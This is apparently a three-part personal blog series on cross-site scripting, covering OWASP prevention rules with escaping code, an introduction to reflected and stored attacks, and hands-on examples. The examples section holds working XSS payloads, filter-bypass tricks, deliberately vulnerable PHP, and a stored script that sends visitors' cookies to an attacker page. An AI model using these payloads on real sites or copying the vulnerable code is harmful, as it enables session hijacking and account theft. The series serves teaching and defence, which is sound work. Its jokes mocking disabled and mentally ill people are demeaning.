Cross-site Scripting – Prevention

This is the final post in my short series on cross-site scripting. After explaining the fundamentals of XSS and having some fun with a few examples, I’d now like to discuss how to prevent these naughty little scripts from threatening web app users. Preventing XSS attacks is ultimately the responsibility of the web developer. However, there are a few options for keeping yourself (the user) safe from attack, which I’ll discuss afterward.

As I’ve made quite clear in my earlier posts, cross-site scripting attacks occur when untrusted data gets inserted dynamically into the HTML body without being validated first. However, writing the encoders necessary to cover all possible types of input data requires a great deal of effort and can be incredibly difficult. Fortunately, OWASP has already taken the difficulty out of this with ESAPI – Enterprise Security Application Programming Interface. ESAPI is a web app security library that provides security controls such as authentication, access control, input validation, output encoding and escaping, and a lot more. It’s an absolutely incredible tool with bindings for several different languages. If you want a secure web app, use ESAPI. End of story. Though if you’re a horribly deranged .NET developer, Microsoft offers the AntiXSS library. However, I can’t vouch for it since I’m a free and open source software advocate.

OWASP has a really great article called the XSS Prevention Cheat Sheet. The positive model they describe is excellent. In fact, I think it’s so great that I’m going to make it the subject of this post. OWASP has defined 7 rules for strengthening web apps. Let’s take a look at each of these rules.

Rule 0: Never Insert Untrusted Data Except in Allowed Locations

If you’re a network administrator, think of this as the “default deny” ruleset used in firewalls. That is, unless it’s within one of the slots described in Rules 1 – 5, don’t insert untrusted data anywhere else into the body of an HTML document. Nowhere! En ninguna parte! Hiçbir yerde! 아직은 없어요

<script>NEVER PUT UNTRUSTED DATA HERE</script>           directly in a script

<!-- NEVER PUT UNTRUSTED DATA HERE -->                   inside an HTML comment

<div NEVER PUT UNTRUSTED DATA HERE=test />               in an attribute name

<NEVER PUT UNTRUSTED DATA HERE href="/test" />           in a tag name
I can’t think of any legitimate reason for inserting untrusted data into an HTML comment or directly inside a <script> tag. It’s completely asinine. If your web app requires it, I urge you to seriously reconsider the design of your web app.

Rule 1: HTML Escape Before Inserting Untrusted Data into HTML Element Content

This should be a no-brainer. I hope that by now I’ve made it very clear that you must escape untrusted data before inserting it into any dynamic HTML content.

<body>ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE</body>

<div>ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE</div>

All other HTML elements as well...

Furthermore, you should also use HTML character entity references to escape the following characters:

When this goes in    This comes out
&                    &amp;
<                    &lt;
>                    &gt;
"                    &quot;
'                    &#x27;
/                    &#x2f;

The reason these need to be escaped is because they all introduce a new execution context for the HTML interpreter. Depending on the character, they can be used to either introduce a new subcontext or close the current one.
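To make Rule 1 concrete, here’s a minimal sketch of such an escaper in JavaScript. The function name is my own; in production you’d use a vetted encoder like the ones ESAPI provides rather than rolling your own:

```javascript
// Map each dangerous character to its entity (same table as above).
var HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2f;'
};

// Escape untrusted data before inserting it into HTML element content.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, function (ch) {
    return HTML_ENTITIES[ch];
  });
}

console.log(escapeHtml("<script>alert('XSS')</script>"));
// → &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;&#x2f;script&gt;
```

Because each character is replaced in a single pass, nothing gets double-encoded.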

Rule 2: Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

This rule only applies to the so-called “common” attributes like name and width. It does not apply to the more advanced attributes like src, href, or class. Neither should it be used with event handlers such as onclick, onload, or onmouseover (event handlers fall under Rule 3).

<div attr="ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE">content</div>     double-quoted

<div attr='ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE'>content</div>     single-quoted

<div attr=ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE>content</div>       unquoted (avoid this!)
All characters below ASCII value 256 that are not alphanumeric should be escaped. If you like, you can use the respective named character entity references (e.g. &quot; or &amp;), but it’s easier to just use the numeric format (i.e. &#nnnn; or &#xhhhh;). Wikipedia has a decent list here (I’m totally in love with Wikipedia, by the way).

I should mention that it’s always a good idea to surround attribute values with single or double quotes. In fact, section 3.2.2 of the HTML 4.0 specification recommends it. Regardless of the effect on validators/checkers or issues of style, quoting attribute values does have some security implications. When attributes are properly quoted, an attacker can only break out of them with the corresponding quote character. However, it’s possible to break out of unquoted attributes with a number of different characters. Since the spec says that unquoted attributes can only contain alphanumeric characters, hyphens, periods and underscores, an attacker can use any other character to break out of the context. For example, % * + , - / ; ^ | and the space character (ASCII value 0x20).
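A sketch of that attribute encoder in JavaScript (the function name is mine; ESAPI’s HTML attribute encoder does the same job more carefully):

```javascript
// Escape untrusted data for a quoted HTML attribute value: every
// non-alphanumeric character below 256 becomes a numeric entity.
function escapeHtmlAttribute(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, function (ch) {
    var code = ch.charCodeAt(0);
    return code < 256 ? '&#x' + code.toString(16).toUpperCase() + ';' : ch;
  });
}

// An attempt to break out of a double-quoted attribute gets neutralized:
console.log(escapeHtmlAttribute('" onmouseover="alert(1)'));
```

The quote, space, and equals sign all come out as numeric entities, so the payload can never terminate the attribute value it was injected into.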

Rule 3: JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

Like I said before, if your web app allows for dynamically generated JavaScript, ask yourself “Is there some other way I can implement the behavior I want?” You’d be putting your users at a tremendous risk. However, if it’s absolutely essential, then be sure to follow this rule.

<script>alert('ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE')</script>

<script>x = 'ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE'</script>

<div onmouseover="x='ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE'"></div>
The only place to put untrusted data where it’s mostly free from harm is inside a quoted data value. This is for the very same reason that you should use quoted attribute values: switching into a new execution context anywhere else is practically child’s play. Just about any JavaScript operator can be used: ; == != && || ?:.

Again, all characters below ASCII value 256 that are not alphanumeric should be escaped. Since we’re talking about JavaScript now and not HTML, characters are escaped using the \xHH syntax. It’s important that you use the ASCII hexadecimal value and not shortcuts like \&, \#, or \@. There’s one gotcha: using \" leaves you vulnerable to “escape-the-escape” attacks. All the attacker has to do is include \" themselves, which gets transformed to \\". The added backslash escapes the attacker’s backslash, leaving the quote live and terminating the string. Pretty clever, right?
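Here’s a sketch of a \xHH encoder (my own illustration). Because the backslash itself is one of the characters that gets hex-encoded, the escape-the-escape trick above no longer works:

```javascript
// Escape untrusted data for a quoted JavaScript string value using \xHH.
function escapeJsString(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, function (ch) {
    var code = ch.charCodeAt(0);
    if (code < 256) {
      return '\\x' + ('0' + code.toString(16).toUpperCase()).slice(-2);
    }
    return ch; // a real encoder would handle non-ASCII with \uHHHH
  });
}

// Both the quote and the backslash are hex-encoded, so neither
// '\"' nor '"' can terminate the string early.
console.log(escapeJsString('\\"; alert(\'XSS\'); //'));
```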

Rule 4: CSS Escape and Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values

When inserting untrusted data into CSS <style> tags or stylesheets, it’s important to remember two things: first, it should be properly validated and second, it should only be put inside property values. Placing it anywhere else is just asking for trouble.

<style> selector { property: ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE; } </style>

<style> selector { property: "ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE"; } </style>

<span style="property: ESCAPE UNTRUSTED DATA BEFORE PUTTING IT HERE">text</span>

Since CSS allows you to use JavaScript to dynamically generate property values, there are a few other things you should be aware of. Make sure that you filter URLs so that they only begin with http: and not javascript:. Internet Explorer 5 introduced a new extension called CSS expressions which you must filter out as well. Even when escaped, there is no safe way to place untrusted data into these expressions.

{ background-image: url("javascript:alert('XSS')"); }

{ width: expression(alert('XSS')); }

The same character-escaping rules from Rule 3 apply here as well. That is, all characters below ASCII value 256 that are not alphanumeric should be escaped (for CSS, using the \HH syntax). You also should not use shortcuts like \" for the same reason as in Rule 3.
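A sketch of a CSS property-value encoder (my own illustration of the \HH format; the trailing space terminates each escape so a following hex digit isn’t absorbed into it):

```javascript
// Escape untrusted data for a CSS property value using \HH hex escapes.
function escapeCss(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, function (ch) {
    var code = ch.charCodeAt(0);
    return code < 256 ? '\\' + code.toString(16).toUpperCase() + ' ' : ch;
  });
}

// The colon and parentheses that make "javascript:" or "expression()"
// work are no longer special after encoding:
console.log(escapeCss("expression(alert('XSS'))"));
```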

Rule 5: URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

Following this rule helps prevent the most common type of XSS attack: placing malicious code directly in GET request parameters.

<a href=" UNTRUSTED DATA BEFORE PUTTING IT HERE">link</a>
All characters below ASCII value 256 that are not alphanumeric should be escaped. URLs use percent-encoding with the %HH syntax where HH is the hexadecimal ASCII value of the character. Character entity references are useless here.
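In JavaScript you might sketch it like this. Note that encodeURIComponent alone isn’t strict enough for this rule, since it leaves characters like ' ( ) untouched, so the sketch encodes every non-alphanumeric character below 256 itself (the URL and parameter name are made up):

```javascript
// Strictly percent-encode untrusted data for a URL parameter value.
function escapeUrlParam(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, function (ch) {
    var code = ch.charCodeAt(0);
    return code < 256
      ? '%' + ('0' + code.toString(16).toUpperCase()).slice(-2)
      : encodeURIComponent(ch); // multi-byte fallback
  });
}

console.log('' +
            escapeUrlParam("<script>alert('XSS')</script>"));
```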

Rule 6: Use an HTML Policy Engine to Validate or Clean User-driven HTML in an Outbound Way

If you want to allow users to embed HTML in their content but only a restricted subset of tags, this is where a library like the OWASP Java HTML Sanitizer comes in handy. It lets you build up an HTML sanitizing whitelist policy very easily without having to write it yourself.

Customizing your policy is very easy. For example, to convert headers into <div> tags, you would use what’s called an element policy:

import java.util.List;

import org.owasp.html.ElementPolicy;
import org.owasp.html.HtmlPolicyBuilder;

// Rewrite h1 through h6 headers as <div class="header-hN"> elements.
new HtmlPolicyBuilder()
    .allowElements(
        new ElementPolicy() {
            public String apply(String elementName, List<String> attributes) {
                attributes.add("class");
                attributes.add("header-" + elementName);
                return "div";
            }
        },
        "h1", "h2", "h3", "h4", "h5", "h6")
    .build(outputChannel);

For more information, see the OWASP Java HTML Sanitizer’s javadoc for the Sanitizers and HtmlPolicyBuilder classes.

Bonus Rule: Use the HttpOnly Cookie Flag

The HttpOnly flag is an optional flag that can be included in the Set-Cookie header of an HTTP response. It instructs the browser to use the cookie only through the HTTP protocol. When set, a cookie will not be accessible through non-HTTP methods like JavaScript (e.g. document.cookie). As you can imagine, this makes it much more difficult for cookies to be stolen.
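As a quick illustration, the flag is just an extra attribute tacked onto the Set-Cookie header value. The cookie name and value here are made up:

```javascript
// Build a Set-Cookie header value for a session cookie that scripts
// can't read. In a Node.js handler you'd pass this to
// res.setHeader('Set-Cookie', ...).
function buildSessionCookie(sessionId) {
  return 'SESSIONID=' + sessionId + '; Path=/; HttpOnly';
}

console.log(buildSessionCookie('abc123'));
// → SESSIONID=abc123; Path=/; HttpOnly
```

Most web frameworks and servlet containers can add the flag for you, as the configuration snippets below show.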

If you’re using Apache Tomcat as a servlet container, the HttpOnly flag can be set for all web apps in the conf/context.xml file:

<Context useHttpOnly="true">

In .NET 2.0, it can be set in the web.config file:

<httpCookies httpOnlyCookies="true" … />

If you’re using PHP (excuse me while I throw up really quick), the flag can be set in the php.ini file using the parameter:

session.cookie_httponly = True

Most modern browsers support HttpOnly so you do not have to worry about issues of platform compatibility.

It’s important to note that these rules only help prevent reflected and stored XSS attacks. Preventing DOM-based attacks is a whole different story. Since I did not talk about DOM-based attacks in this series, I won’t be covering it here. If you’re interested, good ol’ OWASP has a separate article called the DOM-based XSS Prevention Cheat Sheet. Gotta love OWASP. ;)

While it’s impossible to completely eliminate the threat of XSS attacks, following these rules can really strengthen the security model of your web app. Input validation isn’t just the key to preventing XSS attacks; it also helps prevent other forms of code injection like SQL, LDAP, and SSI injection. If you are not cautious, user input forms can easily become a gateway for cyber criminals to compromise both your server and the innocent people who visit your website.

Even if you’re not a web developer, you can still protect yourself from XSS attacks as a user. The most obvious way is simply to disable JavaScript, but not only is this less than 100% effective, it’s just downright stupid. In our modern world of Web 2.0, disabling JavaScript would severely cripple the functionality of nearly every site you visit.

The most effective way to protect yourself would be to use a wonderful little piece of software called NoScript. NoScript is an award-winning Firefox extension that permits executable web content (e.g. JavaScript, Java, Flash, Silverlight, etc.) to run only if the site has been previously deemed trustworthy by you. It implements numerous countermeasures for specific web exploits. Not only can it recognize potential XSS attacks, it also has a firewall-like component called the Application Boundaries Enforcer (ABE), prevents clickjacking with its ClearClick component, and features a few HTTPS enhancements. It even recognized my own attempts to use XSS on my machines, which is fun to watch. I’ve been using NoScript for years and I can’t recommend it enough. Best of all, it’s free and open source!

There’s also the (unoriginal) NotScripts for you Chrome and Opera users. However, it’s very simplistic and nowhere near as featureful as NoScript. Besides, you should be using Firefox anyway. There’s no reason not to. :P

I hope you’ve enjoyed fooling around with XSS as much as I have. It’s quite distinct from most other web app exploits (except for XSRF which is closely related). Quite frankly though, I’ve had about all I can handle for now with web technologies like JavaScript and HTML. I can tolerate it once in a while but my heart truly lies in lower level hacking like systems programming. At the moment, I’m reading Kevin Mitnick’s “The Art of Deception” so perhaps a post or two on social engineering is in order. We’ll see.

Cross-site Scripting – Examples

Last week I gave a general overview of cross-site scripting (XSS) and went over the basic attack theory. If you’re anything like me, then you are probably eager to see XSS in action. Luckily for you, I’ve had a lot of fun this past week with XSS on my home network so I have quite a bit to write about.

Note: If you haven’t already done so, please read my previous post as I will be continuing where I last left off.

Searching for XSS flaws in web apps is a form of black box testing. That is, you typically won’t have any knowledge of the internal system and will need to use a variety of techniques to further understand its implementation. Sure there are some who might disagree with this and argue that it is instead a form of grey box testing. It doesn’t really matter. The truth is, the amount of knowledge you have about a particular web app will vary from site to site. It mostly depends on the amount of access you have to the source code. Semantic matters aside, the point is that you are going to have to perform some amount of information gathering first.

Generally speaking, using XSS to compromise a web app will involve three steps:

  1. Discover any input forms and determine how the GET/POST request variables relate to each input field.
  2. Further examine the code for each input field to detect possible vulnerabilities. This is typically accomplished by entering a harmless JavaScript statement like <script>alert('foobar')</script>.
  3. Analyze the server’s response. If the message box pops up, you’ve got a decent foothold. If not, you may need to experiment further with different encodings and filtering techniques.

These steps can either be done manually or using an automated fuzzing framework. Personally, I like to go the manual route but that’s just because most fuzzing frameworks have a tremendous learning curve. If you’re performing a large-scale penetration test, going with the web app fuzzing framework would definitely be the smart thing to do and save some time.

Let’s consider the welcome banner example I went over briefly in my previous post. Most articles and papers about XSS like to start out with this example. Imagine a social news bookmarking site like Digg. We’ll call it When users log in, the site displays a friendly welcome banner in the upper corner of the page. Perhaps the code looks like this:



<form action="welcome.php" method="get">
    <label for="uname">Username:</label>
    <input type="text" name="uname" id="uname" />

    <label for="passwd">Password:</label>
    <input type="password" name="passwd" id="passwd" />

    <input type="submit" />
</form>

We see that the web app uses a GET request with two variables: uname and passwd (by the way, never ever, ever, ever use GET when transmitting passwords). We can check to see if properly sanitizes its user input field by using the following URL:<script>alert('XSS')</script>

If no form of sanitization is applied, this will result in a popup message that displays “XSS”. Awesome! We can now effectively use as our own personal JavaScript interpreter. This means that welcome.php will probably look something like this:

<?php
echo "Welcome " . $_GET['uname'];
?>

Look at that; nothing! No character encoding or escaping whatsoever. It’s unlikely that you’ll encounter something as moronic as this though. You are more likely to see at least some type of escaping taking place but still lacking in some areas; thus, remaining vulnerable.

For instance, a web developer might try to filter script tags using regular expressions like this:

// Ima catch all those stupid h4x0rz
if (preg_match("/<script[^>]*>/", $_GET['uname'])) {
    echo "Nice try, jerk!";
} else {
    echo "Welcome " . $_GET['uname'];
}
However, this can easily be circumvented. Can you guess how? Well, there are several ways, but remember that HTML is case insensitive? Yeah, remember how ugly everybody’s code used to look during the 90’s? All we have to do is change the case of at least one of the letters in the word “script”:<SCRIPT>alert('XSS')</SCRIPT>
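You can verify the bypass for yourself in a JavaScript console. The developer’s pattern is case sensitive, so the uppercase payload sails right past it:

```javascript
// The filter's regex from above: it matches lowercase "<script...>" only,
// because there's no /i (case-insensitive) flag.
var filter = /<script[^>]*>/;

console.log(filter.test("<script>alert('XSS')</script>")); // true  (caught)
console.log(filter.test("<SCRIPT>alert('XSS')</SCRIPT>")); // false (slips through)
```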

And now we’re back in business. Another way to circumvent attempts to filter input is to encode different parts of your script. Using the same filter, we can get around it using the following URL:<scrip&#x74;>alert('XSS')</script>

All I did here was encode the ASCII value for the letter ‘t’ which is 0x74. The examples could go on and on. There’d be no way to cover every possible way to get around content filtering since each web app is going to use different ways or a combination of ways to sanitize its input fields. Fortunately, RSnake has put together a very comprehensive list of common JavaScript attack vectors here.

Perhaps you’re thinking, “So what’s next? What can I do now?” The answer is: anything. That’s what makes XSS so fun! You have a nearly unlimited amount of room for creativity. When you’ve compromised a machine (and it better be your own) and you’re able to ask yourself, “What can I do with this now?”, you’re in for a fun time. You don’t always get that amount of freedom with certain exploits. I’ll go over some of the most common uses though.

XSS is most commonly used for session hijacking and cookie theft. I’d imagine because it’s astonishingly easy. Since everything up until now has been examples of reflected attacks, let me show you what a stored attack might look like.

Let’s say you’ve found an XSS vulnerability in the Tweedledum message boards. They allow you to include embedded HTML but try to filter it using the /(<script[^>]*>)*|(javascript:)*/ regular expression. You’re a super evil bad guy and want to steal everyone’s cookies. You’d probably post a message like this:

I'm just a normal post. Don't mind me. I'm definitely not stealing your
cookie so I can hijack your session and take over your account. Nope. Not
me.

<scRipt>
function stealMyCookiePlz() {
    window.location = '' + escape(document.cookie);
}
</scRipt>

<img src="" onmouseover="javascript :stealMyCookiePlz()" />

This embeds a small script in the post that sends the user’s cookie to every time their mouse hovers over the image. You could be even more creative and make cookie_monster.php redirect the user right back to the original Tweedledum post. Or if stealing cookies isn’t enough, you could make cookie_monster.php into a fake Tweedledum login page saying something like “Your session has expired, please log back in” so that you could steal their credentials before redirecting them back to the forum.

Notice the uppercase R in the <script> tag and the space between javascript and : in the onmouseover event. This is so that the script slips through and doesn’t match the regular expression.

Yes, that last example was a bit contrived. If you really were a jerk hijacking people’s accounts, you wouldn’t want to risk people not hovering their mouse over the image. Instead you’d just send their browser to right away when the page loaded. However, I mixed things up a bit to demonstrate my next point: how HTML attributes and DOM events can be used in attack vectors.

Merely filtering out <script> tags is not enough to protect your site from XSS attacks. JavaScript statements can still appear inside HTML attributes and DOM event handlers. Similar to the last example, you could post:

<b onmouseover="window.history.back()">Just some "harmless" text. ;)</b>

This is just a harmless but really annoying prank that would send the user back to the previous page when their mouse hovered over the text.

One of my favorites is using an erroneous <img> tag:

<img src="" onerror="alert('Howdy!')" />

This one is really clever. The <img> tag points to an image that doesn’t exist. However, adding the onerror handler forces the code to execute. Pure genius!

One last example I want to look at uses error pages. We’ve all seen them before: 404 error: File not found. Some web developers like to be a fancy pants and configure their server to display a customized error page instead. (Fun fact: Internet Explorer before version 7 refused to display custom error pages unless they were larger than 512 bytes. Add that to the list of things IE won’t do.) If not done properly, they can be used for XSS attacks. An unwise web developer might implement a custom error page like this:

<?php
echo "Nah, you trippin' homez. ";
echo "Ain't no " . urldecode($_SERVER['REQUEST_URI']) . " page here.";
echo "Betta check yoself!";
?>

This page would be rendered when querying a non-existent page. For example:

This would send the following response:

Nah, you trippin' homez. Ain't no /baz.html page here. Betta check yoself!

Oh no he didn’t! Ima pop some JS in his ass! Translation: “I am going to embed malicious JavaScript in your error page, sir.”<script>alert('Take that, jerk!')</script>

This time, you’d get the ghetto-ass error message but with the embedded script along with it. Now it’s just a matter of luring someone to the URL.

Ok, I lied. One more example. I just thought of another really cool idea:

window.onload = function() {
    var links = document.getElementsByTagName('a');

    for (var i = 0; i < links.length; i++) {
        links[i].href = '';
    }
};
This script would change every link on the page to point to This would be especially devastating in the case of a stored attack since all the links would be changed permanently.

There are also several tools available for testing XSS vulnerabilities. OWASP has the CAL9000 project. It’s a collection of web application security testing tools. Unfortunately, it’s no longer actively maintained but it might still prove useful nevertheless. There’s also XSS-Proxy, which is a neat little Perl script designed just for XSS. Another effective tool is ratproxy. Similar to CAL9000, it too is a web app security auditing tool that covers a broad range of security problems, not just XSS. Lastly, you may also want to try Burp Proxy. However, I don’t know much about it since it’s shareware.

Hopefully, this gives you a good idea of all the fun things that can be done using XSS. I highly urge you to quickly set up a small LAMP server in a virtual machine and try it out for yourself. Don’t just take my word for it. It’s a blast! Even though XSS can be fun, it’s quite easy to see how quickly it can become a serious breach of security in the wrong hands. For that reason, next week I will be writing about how to prevent these types of attacks.

Cross-site Scripting – An Introduction

You won’t find me delving into the world of web design too often. Once in a blue moon, maybe I’ll fool around with some JavaScript or XHTML but when I do, I just don’t find it to be that fun. That awful mash-up of control statements, formatting, and actual data leaves me with a strange combination of boredom and headache. That’s a whole other post though so I won’t digress. However, since I’m obviously writing this blog, I’ve had to bite the bullet for the past couple of days and refresh my memory of web applications. For some reason, I keep finding myself coming back to the subject of cross-site scripting. There’s just something about the idea of code “injection” that really gets me excited. Besides, according to CWE, cross-site scripting has become the most commonly reported security vulnerability next to buffer overflows; what’s not awesome about that!?

I’m going to make this into a three-part series of posts. Today will be a general overview of what cross-site scripting is and the different types of attacks. Next I’ll include some real world examples and common attack vectors. Things just wouldn’t be complete if I didn’t talk about how to prevent these naughty scripts and how to review your code for XSS vulnerabilities which will be the focus of the last post.

In its most basic form, cross-site scripting (XSS) is a form of code injection that allows an attacker to embed or “inject” malicious code into an otherwise legitimate website. Essentially, the attacker is taking advantage of the fact that the web application thinks it’s ok to store code from an unknown source because it doesn’t know any better. This code generally takes the form of client-side scripts in JavaScript but just about any embedded content poses a potential threat such as VBScript, PHP, ASP, Flash, ActiveX, etc. That’s part of what makes XSS so widespread; it’s not associated with just one or two languages. It’s not like you could use VBScript for your web app because it’s “safer than JavaScript.” XSS exists due to poor design practices on part of the web developer.

XSS attacks can occur anywhere a web application makes use of input from the user but fails to sanitize it properly. Unvalidated user input is really just the first criterion for an attack. The real damage happens when that input is used by the server to generate dynamic content such as a results page.

So what can attackers do with all this? The consequences range from being a mere annoyance to total account takeovers. In severe cases, an attacker can steal your session cookie, hijack your session, and completely take over your account. Even more dangerous, XSS vulnerabilities can lead to the installation of trojans, full disclosure of sensitive user information, redirection to other malicious sites, and on and on; the number of possibilities is really up to the attacker’s imagination. Think about what could happen if a pharmaceutical site was vulnerable to an XSS flaw. An attacker could modify dosage information for patients which could lead to an overdose. Imagine that: literally killing people with code. That’s some serious shit. It’d take a pretty heartless person to accomplish something like that but my point is that anything is possible with XSS.

A classic example is the user login form. When a user enters their username at a login page, the string is typically redisplayed unchanged after signing in to indicate that they have successfully logged in. If the username field is not properly sanitized by rejecting or at least encoding HTML control characters, it becomes a gaping hole for attackers to do as they please. This is actually a certain type of XSS called a reflected attack. Let’s take a look at what that means.

The types of attacks that use cross-site scripting as an attack vector are nearly limitless but security experts generally recognize two different types of attacks: non-persistent (or reflected) attacks and persistent (or stored) attacks. As a matter of fact, there’s actually a third type called a DOM-based attack where the DOM environment is actually modified. However, this is a more advanced form of XSS and I’m not really interested in going that deep into the subject. For those of you who are curious, OWASP has a great article about it here.

Non-persistent XSS vulnerabilities are among the most common types that show up and are generally what people mean when they talk about cross-site scripting. They occur when input data supplied by a web form is included in the dynamic content of the server’s response. They are sometimes called reflected attacks because the injected code is said to be “reflected” off the web server. You might be thinking “What’s so dangerous about all this if all you can do is infect your own page? No big deal. Whatever, I’m just gonna go watch videos of dancing pigs now.” Well, you’re kind of right. However, sprinkle on a small layer of social engineering and now you’re getting somewhere. Reflected XSS attacks are usually delivered in emails where the victim is baited into visiting a seemingly innocent website. The included URL is specially crafted to point to a legitimate website but also contains the XSS vector.

Consider the following scenario. Imagine that you’ve just suffered a horribly traumatic brain aneurysm which has left your brain so impaired that you now actually enjoy visiting sites like Facebook and Twitter. <tap on the shoulder followed by whispering> Wait…what? Regular non-disabled people habitually update their Facebook status at a rate that nearly suggests narcissistic personality disorder too? I always thought those people were just mentally impaired. Hmm, guess you learn something dumb everyday. Anyway, imagine that you are a completely normal person logged into your Facebook. You receive an email informing you that Facebook has been super l33t h4ck3d and you need to re-login and change your password…fast! You, being a not mentally impaired person who believes that kind of thing, click on the link provided in the email. The link really does direct you to Facebook but contains some malicious JavaScript embedded in it. You login again, all fine and dandy, while your browser blindly executes the embedded script that steals your session cookie and sends it to Now evil bad guys can hijack your session by impersonating you. I’ll leave the rest up to your imagination. Actually, Facebook has fallen victim to several XSS attacks in the past.

The second type of XSS vulnerability is the persistent attack. This occurs when the data input by the attacker is not just included in the dynamic content but is actually stored on the web server permanently. That’s why it’s also called a stored attack. As you’d imagine, this is what makes it the most devastating of XSS flaws. This malicious code typically gets stored in places like databases, message boards, guestbooks, and blog comments. Since the code is stored on the server, it will permanently be displayed on normal pages to anybody that visits it; there’s no need to trick users into visiting a specially crafted URL.

Ever wondered why every message board you visit doesn’t allow you to embed HTML tags in your posts? Here’s why. Imagine an attacker – let’s call him Stu, Stu Pid – discovers that the Foobar message boards allow users to embed HTML tags in posts. Stu Pid starts a new thread with some malicious JavaScript embedded in it. He lays down some flamebait by giving it a highly controversial topic to ensure that plenty of people visit it to start a massive flame war. Maybe he calls it “Why GNU/Linux is Better Than Windows.” For each person that merely visits the page, Stu’s malicious code gets run within their browser, stealing their session cookie, and relaying it to his site. Stu Pid now owns the accounts of every person who viewed his thread. Given the subject matter, that’s probably a lot.

That’s the basics of cross-site scripting. Next week I’ll be setting up a simple web server with a LAMP stack on my home network and try to find all the different ways I can break it. Fun! In my next post, I’ll show you some of the things I was able to do with a couple of examples and common attack vectors.